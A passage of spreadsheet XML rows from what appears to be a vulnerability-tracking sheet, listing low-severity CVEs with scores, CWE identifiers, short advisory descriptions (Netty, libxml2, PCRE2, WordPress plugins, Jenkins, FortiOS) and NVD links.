      <c r="C5886" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5886" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5886" s="5" t="inlineStr"/>
      <c r="F5886" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G5886" s="5" t="inlineStr"/>
      <c r="H5886" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I5886" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J5886" s="5" t="inlineStr"/>
      <c r="K5886" s="5" t="inlineStr">
        <is>
          <t>CWE-113, CWE-93</t>
        </is>
      </c>
      <c r="L5886" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M5886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42578</t>
        </is>
      </c>
    </row>
    <row r="5887">
      <c r="A5887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85639</t>
        </is>
      </c>
      <c r="C5887" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5887" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5887" s="5" t="inlineStr"/>
      <c r="F5887" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5887" s="5" t="inlineStr"/>
      <c r="H5887" s="5" t="inlineStr"/>
      <c r="I5887" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5887" s="5" t="inlineStr"/>
      <c r="K5887" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5887" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in jofpin trape 2.0. This vulnerability affects unknown code of the file core/user.py of the component Telemetry Endpoint. Such manipulation of the argument vId leads to race condition. The attack can be executed remotely. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85639</t>
        </is>
      </c>
    </row>
    <row r="5888">
      <c r="A5888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85704</t>
        </is>
      </c>
      <c r="C5888" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5888" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5888" s="5" t="inlineStr"/>
      <c r="F5888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5888" s="5" t="inlineStr"/>
      <c r="H5888" s="5" t="inlineStr"/>
      <c r="I5888" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5888" s="5" t="inlineStr"/>
      <c r="K5888" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5888" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. This issue affects the function getJailbreak of the file server/config.py of the component Jailbreak Mode. The manipulation results in race condition. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is assessed as difficult. The exploit has been released to the public and may be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M5888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85704</t>
        </is>
      </c>
    </row>
    <row r="5889">
      <c r="A5889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86137</t>
        </is>
      </c>
      <c r="C5889" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5889" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5889" s="5" t="inlineStr"/>
      <c r="F5889" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5889" s="5" t="inlineStr"/>
      <c r="H5889" s="5" t="inlineStr"/>
      <c r="I5889" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5889" s="5" t="inlineStr"/>
      <c r="K5889" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5889" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, xmlFAParsePosCharGroup has an out-of-bounds read, aka an out-of-bounds read in the NXT macro in xmlregexp.</t>
        </is>
      </c>
      <c r="M5889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86137</t>
        </is>
      </c>
    </row>
    <row r="5890">
      <c r="A5890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86141</t>
        </is>
      </c>
      <c r="C5890" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5890" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5890" s="5" t="inlineStr"/>
      <c r="F5890" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5890" s="5" t="inlineStr"/>
      <c r="H5890" s="5" t="inlineStr"/>
      <c r="I5890" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5890" s="5" t="inlineStr"/>
      <c r="K5890" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L5890" s="5" t="inlineStr">
        <is>
          <t>xmlregexp in libxml2 before 2.15.4 has a NULL pointer dereference in xmlRegNewParserCtxt after a strdup failure, i.e., it does not calculate a string length after NULL checking.</t>
        </is>
      </c>
      <c r="M5890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86141</t>
        </is>
      </c>
    </row>
    <row r="5891">
      <c r="A5891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86231</t>
        </is>
      </c>
      <c r="C5891" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5891" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5891" s="5" t="inlineStr"/>
      <c r="F5891" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5891" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5891" s="5" t="inlineStr"/>
      <c r="I5891" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5891" s="5" t="inlineStr"/>
      <c r="K5891" s="5" t="inlineStr">
        <is>
          <t>CWE-298, CWE-299</t>
        </is>
      </c>
      <c r="L5891" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mwiede jsch up to 2.28.5. Affected is the function getRevokedKeys of the file src/main/java/com/jcraft/jsch/KnownHosts.java. Performing a manipulation of the argument known_hosts results in improper check for certificate revocation. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is told to be difficult. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.28.6 is able to address this issue. The patch is named 194a2f76a5c0f1c3f778565be3fd66bcafc42d23. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="M5891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86231</t>
        </is>
      </c>
    </row>
    <row r="5892">
      <c r="A5892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86670</t>
        </is>
      </c>
      <c r="C5892" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5892" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5892" s="5" t="inlineStr"/>
      <c r="F5892" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5892" s="5" t="inlineStr"/>
      <c r="H5892" s="5" t="inlineStr"/>
      <c r="I5892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5892" s="5" t="inlineStr"/>
      <c r="K5892" s="5" t="inlineStr">
        <is>
          <t>CWE-326, CWE-916</t>
        </is>
      </c>
      <c r="L5892" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t>
        </is>
      </c>
    </row>
    <row r="5893">
      <c r="A5893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89156</t>
        </is>
      </c>
      <c r="C5893" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5893" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5893" s="5" t="inlineStr"/>
      <c r="F5893" s="5" t="inlineStr"/>
      <c r="G5893" s="5" t="inlineStr"/>
      <c r="H5893" s="5" t="inlineStr"/>
      <c r="I5893" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5893" s="5" t="inlineStr"/>
      <c r="K5893" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5893" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read after a JIT fallback when an attacker can provide invalid UTF data.</t>
        </is>
      </c>
      <c r="M5893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89156</t>
        </is>
      </c>
    </row>
    <row r="5894">
      <c r="A5894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89162</t>
        </is>
      </c>
      <c r="C5894" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5894" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5894" s="5" t="inlineStr"/>
      <c r="F5894" s="5" t="inlineStr"/>
      <c r="G5894" s="5" t="inlineStr"/>
      <c r="H5894" s="5" t="inlineStr"/>
      <c r="I5894" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5894" s="5" t="inlineStr"/>
      <c r="K5894" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L5894" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_serialize_encode might disclose two bytes to an adversary, typically in a situation where the access available to the adversary is already unsafe.</t>
        </is>
      </c>
      <c r="M5894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89162</t>
        </is>
      </c>
    </row>
    <row r="5895">
      <c r="A5895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86501</t>
        </is>
      </c>
      <c r="C5895" s="5" t="n">
        <v>2.8</v>
      </c>
      <c r="D5895" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5895" s="5" t="inlineStr"/>
      <c r="F5895" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5895" s="5" t="inlineStr"/>
      <c r="H5895" s="5" t="inlineStr"/>
      <c r="I5895" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5895" s="5" t="inlineStr"/>
      <c r="K5895" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L5895" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 terminal command input could be written to idea.log</t>
        </is>
      </c>
      <c r="M5895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86501</t>
        </is>
      </c>
    </row>
    <row r="5896">
      <c r="A5896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5896" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15693</t>
        </is>
      </c>
      <c r="C5896" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5896" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5896" s="5" t="inlineStr"/>
      <c r="F5896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5896" s="5" t="inlineStr"/>
      <c r="H5896" s="5" t="inlineStr"/>
      <c r="I5896" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5896" s="5" t="inlineStr"/>
      <c r="K5896" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5896" s="5" t="inlineStr">
        <is>
          <t>The JCH Optimize WordPress plugin before 5.0.1 does not properly restrict a directory path provided to one of its administrative image-browsing features to within the site, allowing high-privilege users, administrators on single-site and sub-site administrators on multisite, to enumerate directories and file names outside the web root.</t>
        </is>
      </c>
      <c r="M5896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15693</t>
        </is>
      </c>
    </row>
    <row r="5897">
      <c r="A5897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48074</t>
        </is>
      </c>
      <c r="C5897" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5897" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5897" s="5" t="inlineStr"/>
      <c r="F5897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5897" s="5" t="inlineStr"/>
      <c r="H5897" s="5" t="inlineStr"/>
      <c r="I5897" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5897" s="5" t="inlineStr"/>
      <c r="K5897" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5897" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.6, when a TENANT_ADMIN deletes an existing staff user, the underlying `StaffService.deleteStaffMember()` runs an additional invite cleanup that deletes from the central `user_invite` table by email. The `email` clause has no `tenantId` predicate. Any pending invite in any tenant that shares the deleted staff's email is removed. A TENANT_ADMIN of tenant A who deletes a staff record with email `victim[@]example[.]com` also deletes the pending invite for `victim[@]example[.]com` in tenant B, even though they have no relationship to tenant B. The user-side delete is correctly scoped (`eq(user.id, staffId), eq(user.tenantId, tenantId)`), and the pending-invite-only delete path (when `staffId` is itself an invite ID) is also tenant-scoped. The bug is specifically in the invite cleanup that runs as a side effect of deleting an existing staff user. Version 1.0.6 patches the issue.</t>
        </is>
      </c>
      <c r="M5897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48074</t>
        </is>
      </c>
    </row>
    <row r="5898">
      <c r="A5898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70430</t>
        </is>
      </c>
      <c r="C5898" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5898" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5898" s="5" t="inlineStr"/>
      <c r="F5898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5898" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H5898" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I5898" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5898" s="5" t="inlineStr"/>
      <c r="K5898" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5898" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier does not restrict the types of objects that can be instantiated as part of the project naming strategy configuration, allowing attackers with Overall/Manage permission to instantiate arbitrary types related to configuration, including those intended for configuration only by administrators.</t>
        </is>
      </c>
      <c r="M5898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70430</t>
        </is>
      </c>
    </row>
    <row r="5899">
      <c r="A5899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78150</t>
        </is>
      </c>
      <c r="C5899" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5899" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5899" s="5" t="inlineStr"/>
      <c r="F5899" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5899" s="5" t="inlineStr"/>
      <c r="H5899" s="5" t="inlineStr"/>
      <c r="I5899" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5899" s="5" t="inlineStr"/>
      <c r="K5899" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5899" s="5" t="inlineStr">
        <is>
          <t>The Smart Post  WordPress plugin before 4.0.8 does not check the type, ownership or status of the post it is asked to duplicate, allowing users with contributor privileges and above to copy any private or password protected post into a draft of their own and read its content and metadata.</t>
        </is>
      </c>
      <c r="M5899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78150</t>
        </is>
      </c>
    </row>
    <row r="5900">
      <c r="A5900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84392</t>
        </is>
      </c>
      <c r="C5900" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5900" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5900" s="5" t="inlineStr"/>
      <c r="F5900" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5900" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5900" s="5" t="inlineStr"/>
      <c r="I5900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5900" s="5" t="inlineStr"/>
      <c r="K5900" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L5900" s="5" t="inlineStr">
        <is>
          <t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="M5900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t>
        </is>
      </c>
    </row>
    <row r="5901">
      <c r="A5901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84745</t>
        </is>
      </c>
      <c r="C5901" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5901" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5901" s="5" t="inlineStr"/>
      <c r="F5901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5901" s="5" t="inlineStr"/>
      <c r="H5901" s="5" t="inlineStr"/>
      <c r="I5901" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5901" s="5" t="inlineStr"/>
      <c r="K5901" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5901" s="5" t="inlineStr">
        <is>
          <t>The Events Calendar WordPress plugin before 6.17.3.1 does not restrict non-public content to the users entitled to read it on its public REST archives, allowing users with a low-privilege role such as contributor to read the full contents of every unpublished record on the site, including other users'.</t>
        </is>
      </c>
      <c r="M5901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84745</t>
        </is>
      </c>
    </row>
    <row r="5902">
      <c r="A5902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84926</t>
        </is>
      </c>
      <c r="C5902" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5902" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5902" s="5" t="inlineStr"/>
      <c r="F5902" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5902" s="5" t="inlineStr"/>
      <c r="H5902" s="5" t="inlineStr"/>
      <c r="I5902" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5902" s="5" t="inlineStr"/>
      <c r="K5902" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5902" s="5" t="inlineStr">
        <is>
          <t>The EmbedPress  WordPress plugin before 4.6.4 does not correctly restrict access to one of its Google Reviews REST routes to administrators, allowing any authenticated user with contributor-level access or above to read the site administrator's email address, a value WordPress core withholds from that role.</t>
        </is>
      </c>
      <c r="M5902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84926</t>
        </is>
      </c>
    </row>
    <row r="5903">
      <c r="A5903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84927</t>
        </is>
      </c>
      <c r="C5903" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5903" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5903" s="5" t="inlineStr"/>
      <c r="F5903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5903" s="5" t="inlineStr"/>
      <c r="H5903" s="5" t="inlineStr"/>
      <c r="I5903" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5903" s="5" t="inlineStr"/>
      <c r="K5903" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5903" s="5" t="inlineStr">
        <is>
          <t>The EmbedPress  WordPress plugin before 4.6.4 does not perform a sufficient authorization check on one of its Google Reviews REST API routes, allowing users with the Contributor role and above to modify a site-wide store, deleting entries an administrator configured and injecting their own, which are rendered publicly across the site.</t>
        </is>
      </c>
      <c r="M5903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84927</t>
        </is>
      </c>
    </row>
    <row r="5904">
      <c r="A5904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86779</t>
        </is>
      </c>
      <c r="C5904" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5904" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5904" s="5" t="inlineStr"/>
      <c r="F5904" s="5" t="inlineStr"/>
      <c r="G5904" s="5" t="inlineStr"/>
      <c r="H5904" s="5" t="inlineStr"/>
      <c r="I5904" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5904" s="5" t="inlineStr"/>
      <c r="K5904" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5904" s="5" t="inlineStr">
        <is>
          <t>The Visualizer  WordPress plugin before 4.0.6 does not properly authorise chart-deletion requests, performing only a site-wide capability check with no per-object ownership verification, allowing users with the Contributor role and above to permanently delete any chart on the site, including charts created by other users such as administrators.</t>
        </is>
      </c>
      <c r="M5904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86779</t>
        </is>
      </c>
    </row>
    <row r="5905">
      <c r="A5905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87525</t>
        </is>
      </c>
      <c r="C5905" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D5905" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5905" s="5" t="inlineStr"/>
      <c r="F5905" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5905" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H5905" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I5905" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5905" s="5" t="inlineStr"/>
      <c r="K5905" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5905" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to read memory outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87525</t>
        </is>
      </c>
    </row>
    <row r="5906">
      <c r="A5906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55824</t>
        </is>
      </c>
      <c r="C5906" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="D5906" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5906" s="5" t="inlineStr"/>
      <c r="F5906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5906" s="5" t="inlineStr"/>
      <c r="H5906" s="5" t="inlineStr"/>
      <c r="I5906" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5906" s="5" t="inlineStr"/>
      <c r="K5906" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5906" s="5" t="inlineStr">
        <is>
          <t>Contao is an Open Source CMS. In versions 4.13.40 through 5.3.46 and 5.7.0-RC1 through 5.7.6, the crawler leaks auth credentials to external hosts. Contao's crawler tries to prevent confidential HTTP client options from being sent to external domains by creating a scoped client: full options for root page origins, cleaned options for everything else. The cleaner removes Cookie and Authorization headers, but it removes the non-Symfony option names basic_auth and bearer_auth instead of Symfony HttpClient's real auth_basic and auth_bearer options. When contao.crawl.default_http_client_options contains Basic or Bearer authentication for a protected staging/production site, those credentials remain in the "clean" client used for external links or configured additional URIs. An attacker who can get an external URL crawled, for example through a link on a crawled page while the broken-link checker is enabled, can receive the crawler credentials. This issue has been fixed in versions 5.3.47 and 5.7.7.</t>
        </is>
      </c>
      <c r="M5906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55824</t>
        </is>
      </c>
    </row>
    <row r="5907">
      <c r="A5907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18743</t>
        </is>
      </c>
      <c r="C5907" s="5" t="n">
        <v>2.5</v>
      </c>
      <c r="D5907" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5907" s="5" t="inlineStr"/>
